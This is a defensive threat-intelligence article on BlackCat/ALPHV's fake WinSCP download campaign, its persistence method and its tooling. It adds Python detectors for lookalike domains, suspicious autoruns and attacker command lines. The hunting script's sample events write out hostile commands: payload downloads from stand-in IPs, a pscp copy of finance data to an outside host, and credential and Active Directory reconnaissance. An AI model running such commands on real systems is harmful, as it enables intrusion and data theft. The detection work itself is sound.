Detriments of Ransomware Threats: BlackCat’s New Attack Vector

The BlackCat ransomware group, also known as ALPHV, has been luring victims with fake pages that mimic the official website of WinSCP, a popular file-transfer application. Instead of the legitimate program, these pages serve trojanized installers.

BlackCat has emerged as a highly sophisticated and prominent ransomware group since it first appeared in late 2021, and it drew particular attention as one of the first prominent malware families written in the Rust programming language. Rust's rising popularity is attributed to its performance and strong memory-safety guarantees; for a malware author the language has further advantages, since it cross-compiles easily to Windows and Linux targets and, at the time, Rust binaries were unfamiliar to many analysts and poorly covered by existing detection signatures.

Attack Vector

BlackCat targets system administrators, web administrators, and IT professionals by leveraging the popularity of the WinSCP file-transfer application. Their malvertising campaigns appear on search engines such as Google and Bing, directing users to fake pages that closely resemble the official WinSCP website. These pages are designed to trick victims into downloading malware-ridden installers.

When users search for "WinSCP Download", the malicious ads placed by BlackCat appear above the legitimate results. Clicking one lands the victim on a site hosting tutorials on automated file transfers with WinSCP. These pages look harmless, but they redirect to clones of the official WinSCP download page on lookalike domains such as "winsccp[.]com" (the real site is winscp.net), which offer an ISO file containing "setup.exe" and "msi.dll". Packaging the payload as a disk image is a deliberate choice: files run from a mounted ISO have historically not carried the Mark-of-the-Web that triggers SmartScreen warnings on downloaded executables. The executable is only the lure the victim double-clicks; it calls into msi.dll, which drops the genuine WinSCP installer alongside a malicious Python execution environment.
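The lookalike domain is the one part of this chain a proxy log can catch before anything runs. The script below is an added example written for this page (not code from the article or from any vendor): it parses constructed proxy log lines, scores each requested host against an allow-list of legitimate download hosts by edit distance on the main label, and separately flags disk-image downloads from hosts that are not on the list. The log format, the user names and the tutorial host are invented for the demo; the only real identifiers are winscp.net and the clone domain named in the text.

```python
"""
Flag lookalike download domains and disk-image downloads in web-proxy logs.

Added example for this page, not code from the article or from any vendor.
The log lines are constructed; winscp.net (the real WinSCP host) and
winsccp.com (the clone domain named in the article) are the only real names.
"""
import re
from dataclasses import dataclass
from urllib.parse import urlsplit

# Hosts this software is expected to be downloaded from (assumption for the demo;
# in practice this is the allow-list your software catalogue maintains).
LEGIT_DOWNLOAD_HOSTS = {"winscp.net"}

# Constructed proxy log lines in a simple key=value format.
SAMPLE_LOG = [
    "2023-06-01T10:02:11Z user=jdoe src=10.1.2.3 url=https://winscp.net/eng/download.php status=200",
    "2023-06-01T10:05:42Z user=asmith src=10.1.2.4 url=https://winsccp.com/download/WinSCP-Setup.iso status=200",
    "2023-06-01T10:07:19Z user=bwong src=10.1.2.5 url=https://files.example-tutorials.net/winscp/setup.iso status=200",
    "2023-06-01T10:09:03Z user=cdiaz src=10.1.2.6 url=https://www.winscp.net/eng/docs/scripting status=200",
    "2023-06-01T10:09:55Z proxy restarted",  # no request fields; the parser skips it
]

LOG_RE = re.compile(r"user=(?P<user>\S+) src=\S+ url=(?P<url>\S+)")


@dataclass
class Finding:
    user: str
    url: str
    reason: str


def levenshtein(a: str, b: str) -> int:
    """Edit distance; a small distance to an allow-listed name is the typosquat signal."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def main_label(host: str) -> str:
    """Second-level label: 'winsccp' for 'www.winsccp.com'. Production code should
    use the public-suffix list so that 'example.co.uk' is handled; a plain split is
    enough for the demo."""
    labels = host.lower().removeprefix("www.").split(".")
    return labels[-2] if len(labels) >= 2 else labels[0]


def classify_host(host: str) -> str:
    host = host.lower().removeprefix("www.")
    if host in LEGIT_DOWNLOAD_HOSTS:
        return "legit"
    for legit in LEGIT_DOWNLOAD_HOSTS:
        mine, theirs = main_label(host), main_label(legit)
        if mine == theirs:
            return "lookalike"  # same name registered under a different TLD
        # Two edits catch doubled or swapped letters (winsccp); drop to one edit for
        # short names, where two edits would match unrelated words.
        if levenshtein(mine, theirs) <= (2 if len(theirs) >= 6 else 1):
            return "lookalike"
    return "other"


def scan_proxy_log(lines):
    findings = []
    for line in lines:
        m = LOG_RE.search(line)
        if not m:
            continue
        url = m["url"]
        parts = urlsplit(url)
        host = parts.hostname or ""
        verdict = classify_host(host)
        if verdict == "lookalike":
            findings.append(Finding(m["user"], url, f"lookalike of an allow-listed host: {host}"))
        elif verdict == "other" and parts.path.lower().endswith((".iso", ".img")):
            # Disk images from unvetted hosts: the container this campaign used.
            findings.append(Finding(m["user"], url, f"disk-image download from unvetted host: {host}"))
    return findings


if __name__ == "__main__":
    for f in scan_proxy_log(SAMPLE_LOG):
        print(f"{f.user:8} {f.reason}\n         {f.url}")
```

Run over the constructed log, the script reports asmith (winsccp.com is one edit from winscp) and bwong (an .iso from a host that is not on the allow-list) and stays silent on the two genuine winscp.net requests. The edit-distance threshold is the knob to watch: for short legitimate names it produces noise, which is why the example tightens it below six characters.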

Persistence and Advanced Techniques

Once setup.exe runs, msi.dll extracts a Python folder from its RCDATA resource section and also installs the genuine WinSCP, so the victim ends up with the application they expected and has no reason to suspect anything. Along with it, a trojanized python310.dll is dropped, and persistence is established through a Run key named "Python" with the value "C:\Users\Public\Music\python\pythonw.exe". At each logon pythonw.exe loads the obfuscated python310.dll, which contains a Cobalt Strike beacon that connects to the group's command-and-control (C2) server. Two details make this entry stand out on a host: the path is a world-writable directory rather than a Python install location, and the standard Python installer never registers pythonw.exe as an autorun.
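The Run-key entry above is a pattern rather than a single indicator: an interpreter or script host launched from, or pointed at, a directory any user can write to. The script below is an added example written for this page (not the article's or any vendor's code). It scores autorun entries on exactly those two signals and generalizes beyond the pythonw.exe case to wscript, mshta, rundll32 and similar hosts. The entries are constructed; the first reproduces the value reported in the text, the rest (OneDrive, SecurityHealth, a hypothetical "Updater") are typical of what a real Run key holds. On a live host the same entries would come from the HKCU and HKLM Run keys, Autoruns output or Sysmon registry events; this script only scores them.

```python
"""
Triage autorun (Run key) entries for the persistence pattern described above:
an interpreter host launched from, or pointed at, a user-writable directory.

Added example for this page, not code from the article or from any vendor.
The entries are constructed; the first one is the value the article reports.
"""
import ntpath
from dataclasses import dataclass, field

# Path fragments an unprivileged user can write to (lower-cased, with a trailing
# backslash so "c:\users\public\" does not also match "c:\users\publicity\").
USER_WRITABLE_MARKERS = (
    "c:\\users\\public\\",
    "\\appdata\\",
    "c:\\programdata\\",
    "\\temp\\",
)

# Script and interpreter hosts. Their real binaries live under System32 or a proper
# install directory; a Run value that starts one from, or points one at, a
# user-writable path is the pattern in the text.
INTERPRETERS = {
    "pythonw.exe", "python.exe", "wscript.exe", "cscript.exe",
    "mshta.exe", "powershell.exe", "rundll32.exe", "regsvr32.exe",
}

SEVERITY_RANK = {"high": 0, "medium": 1, "low": 2}

# Constructed sample: (value name, value data) as stored in a Run key.
SAMPLE_AUTORUNS = [
    ("Python", r"C:\Users\Public\Music\python\pythonw.exe"),  # from the article
    ("OneDrive", r'"C:\Users\jdoe\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background'),
    ("SecurityHealth", r"%windir%\system32\SecurityHealthSystray.exe"),
    ("Updater", r'wscript.exe //B "C:\ProgramData\upd\check.vbs"'),  # hypothetical
]


@dataclass
class Finding:
    name: str
    executable: str
    severity: str
    reasons: list = field(default_factory=list)


def first_token(command: str) -> str:
    """Executable portion of a Run value: a quoted path, or the text up to the first space."""
    command = command.strip()
    if command.startswith('"'):
        end = command.find('"', 1)
        return command[1:end] if end > 0 else command[1:]
    return command.split()[0] if command else ""


def triage_autorun(name: str, command: str) -> Finding:
    exe = first_token(command)
    exe_name = ntpath.basename(exe).lower()
    lowered = command.lower()
    reasons = []
    # Scan the whole value, not just the executable: "wscript.exe C:\ProgramData\x.vbs"
    # runs a System32 binary but the payload still lives in a user-writable path.
    if any(marker in lowered for marker in USER_WRITABLE_MARKERS):
        reasons.append("references a user-writable path")
    if exe_name in INTERPRETERS:
        reasons.append(f"launches an interpreter host ({exe_name})")
    if len(reasons) == 2:
        severity = "high"    # the combination the article describes
    elif reasons:
        severity = "medium"  # many legitimate per-user apps live in AppData: review, don't block
    else:
        severity = "low"
    return Finding(name, exe, severity, reasons)


def triage_all(entries):
    findings = [triage_autorun(n, c) for n, c in entries]
    return sorted(findings, key=lambda f: (SEVERITY_RANK[f.severity], f.name))


if __name__ == "__main__":
    for f in triage_all(SAMPLE_AUTORUNS):
        print(f"{f.severity:6} {f.name:15} {f.executable}  {'; '.join(f.reasons)}")
```

The article's entry scores high on both signals; the hypothetical "Updater" scores high as well because the script path, not the executable, is in ProgramData. OneDrive lands on medium, which is the expected amount of noise from per-user installs and the reason the medium tier is a review queue rather than an alert.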

Tools and Techniques

The BlackCat ransomware group uses a mix of off-the-shelf and custom tools to extend its foothold and move laterally within compromised networks.

Some notable tools used by ALPHV include:

  • AdFind for Active Directory enumeration,

  • PowerShell commands for data gathering and script execution,

  • AccessChk64 for user and group permission reconnaissance,

  • findstr for searching XML configuration files for stored passwords,

  • PowerView for AD reconnaissance and enumeration,

  • Python scripts for password recovery and credential retrieval,

  • PsExec, BitsAdmin, and curl for lateral movement and for moving tooling between hosts,

  • AnyDesk, a legitimate remote-management tool, abused for persistent access,

  • a "KillAV" batch script for disabling antivirus and anti-malware products,

  • the PuTTY Secure Copy client (pscp) for exfiltration, and

  • the SpyBoy "Terminator", an EDR and antivirus killer that loads a vulnerable signed driver to terminate security processes from the kernel (a bring-your-own-vulnerable-driver technique).
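Almost every item on that list leaves a process-creation event with a recognizable command line, so a small set of command-line rules run over endpoint telemetry recovers the intrusion timeline. The script below is an added example written for this page (not the article's or any vendor's code). It applies one pattern per tool to constructed Sysmon-like process events and then groups hits per host, because several distinct tools on one machine in a short window is a far stronger signal than any single command. The hostnames, paths and command lines are invented for the demo, IP addresses come from the documentation ranges, and the patterns are a starting point for your own rules rather than a complete signature set. The Terminator driver and the KillAV script are deliberately absent: catching them needs driver-load and service-stop telemetry, not command lines.

```python
"""
Hunt process-creation telemetry for the tooling listed above.

Added example for this page, not code from the article or from any vendor.
Events are constructed in a Sysmon-like shape (host, image, command line);
198.51.100.0/24 and 203.0.113.0/24 are documentation address ranges.
"""
import re
from collections import defaultdict
from dataclasses import dataclass


@dataclass
class Hit:
    host: str
    rule: str
    command: str


# (label, pattern applied to the lower-cased command line). The PowerView names are
# the tool's own function names; keep the list explicit, since a loose "get-net*"
# would also match the built-in NetTCPIP cmdlets such as Get-NetAdapter.
RULES = [
    ("AdFind AD enumeration", re.compile(r"(^|\\|\s)adfind(\.exe)?\s")),
    ("findstr password search in XML", re.compile(r"\bfindstr\b.*password.*\.xml")),
    ("AccessChk permission recon", re.compile(r"\baccesschk(64)?(\.exe)?\s")),
    ("PowerView AD recon", re.compile(
        r"\b(get-net(user|computer|group|session)|get-domain(user|computer|group)"
        r"|invoke-sharefinder|invoke-userhunter|find-localadminaccess)\b")),
    ("PsExec remote execution", re.compile(r"\bpsexe(c|svc)(\.exe)?\b")),
    ("BITSAdmin download", re.compile(r"\bbitsadmin(\.exe)?\b.*/transfer")),
    ("curl download to disk", re.compile(r"\bcurl(\.exe)?\b.*\s-o\s")),
    ("AnyDesk remote access", re.compile(r"\banydesk(\.exe)?\b")),
    ("pscp outbound copy", re.compile(r"\bpscp(\.exe)?\b")),
]

# Constructed events; one benign Chrome process is included as a control.
SAMPLE_EVENTS = [
    {"host": "WS01", "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'cmd.exe /c adfind.exe -f "objectcategory=computer" > computers.txt'},
    {"host": "WS01", "image": r"C:\Windows\System32\findstr.exe",
     "cmdline": r"findstr /S /I password *.xml"},
    {"host": "WS01", "image": r"C:\Users\Public\accesschk64.exe",
     "cmdline": r'accesschk64.exe -accepteula -uwcqv "Authenticated Users" C:\Windows'},
    {"host": "WS01", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r'powershell.exe -nop -c "Import-Module .\PowerView.ps1; Get-DomainComputer -Unconstrained"'},
    {"host": "SRV02", "image": r"C:\Tools\PsExec.exe",
     "cmdline": r"PsExec.exe \\FS01 -s cmd.exe"},
    {"host": "SRV02", "image": r"C:\Windows\System32\bitsadmin.exe",
     "cmdline": r"bitsadmin /transfer job /download /priority high http://198.51.100.7/a.exe C:\Users\Public\a.exe"},
    {"host": "WS03", "image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "cmdline": r'"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer'},
    {"host": "WS03", "image": r"C:\Users\jdoe\AppData\Roaming\AnyDesk\AnyDesk.exe",
     "cmdline": r'"C:\Users\jdoe\AppData\Roaming\AnyDesk\AnyDesk.exe" --service'},
    {"host": "WS03", "image": r"C:\Windows\System32\curl.exe",
     "cmdline": r"curl.exe -s -o C:\Users\Public\t.exe http://198.51.100.7/t.exe"},
    {"host": "FS01", "image": r"C:\Tools\pscp.exe",
     "cmdline": r"pscp.exe -pw ******** C:\share\finance.zip backup@203.0.113.9:/tmp/"},
]


def hunt(events):
    """Return one Hit per (event, matching rule), in event order."""
    hits = []
    for ev in events:
        lowered = ev["cmdline"].lower()
        for label, pattern in RULES:
            if pattern.search(lowered):
                hits.append(Hit(ev["host"], label, ev["cmdline"]))
    return hits


def summarize(hits):
    """Group rule labels per host; a host with recon plus lateral-movement tooling
    is the one to pull first."""
    by_host = defaultdict(list)
    for h in hits:
        by_host[h.host].append(h.rule)
    return dict(by_host)


if __name__ == "__main__":
    for host, rules in summarize(hunt(SAMPLE_EVENTS)).items():
        print(f"{host}: {', '.join(rules)}")
```

On the constructed data WS01 shows the full reconnaissance set (AdFind, findstr, AccessChk, PowerView), SRV02 the lateral-movement pair (PsExec, BITSAdmin), and FS01 the outbound pscp copy, which is the order of events a responder would expect to reconstruct. Matching on lower-cased command lines keeps the patterns case-insensitive without relying on how each log source normalizes them.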

Recommended Mitigation

To mitigate the risk posed by the BlackCat ransomware group, organizations are advised to implement the following measures:

  • Download Software Only from Vendor Sites: The lure in this campaign is a search ad, not an e-mail, so make users aware that the first sponsored result is not necessarily the vendor. Reach download pages by typing or bookmarking the vendor's domain (winscp.net for WinSCP), check the domain before running anything, and verify the installer's digital signature where the vendor signs it. Treat an ISO or IMG offered where an installer was expected as suspect.

  • Web Filtering: Deploy web filtering to block known malicious sites and malvertising redirect chains, and consider blocking, or at least alerting on, disk-image (.iso, .img) downloads from hosts outside your software allow-list.

  • Endpoint Monitoring: Alert on Run-key and other autorun entries that point into user-writable locations such as C:\Users\Public, on interpreters such as pythonw.exe executing from those locations, and on unexpected use of the tooling listed above (AnyDesk, PsExec, AdFind, AccessChk).

  • Security Software: Keep all security software, including antivirus and anti-malware solutions, up to date with the latest definitions, and make sure the agent's tamper protection is enabled, since this group ships tools whose only purpose is to disable it.

  • Patch Management: Regularly update software and operating systems with the latest security patches to address known vulnerabilities.

  • Multi-Factor Authentication (MFA): Implement MFA for critical systems and user accounts so that credentials recovered on one host are not enough on their own to reach the rest of the network.

In conclusion, the BlackCat ransomware group, also known as ALPHV, has established itself as a formidable threat in the cybersecurity landscape. With its adoption of the Rust programming language and the ability to compromise both Windows and Linux-based systems, BlackCat poses a significant risk to organizations. While recent data suggests a decline in recorded infections, it is crucial for organizations to remain vigilant and implement robust security measures to protect against evolving ransomware threats like BlackCat.

 
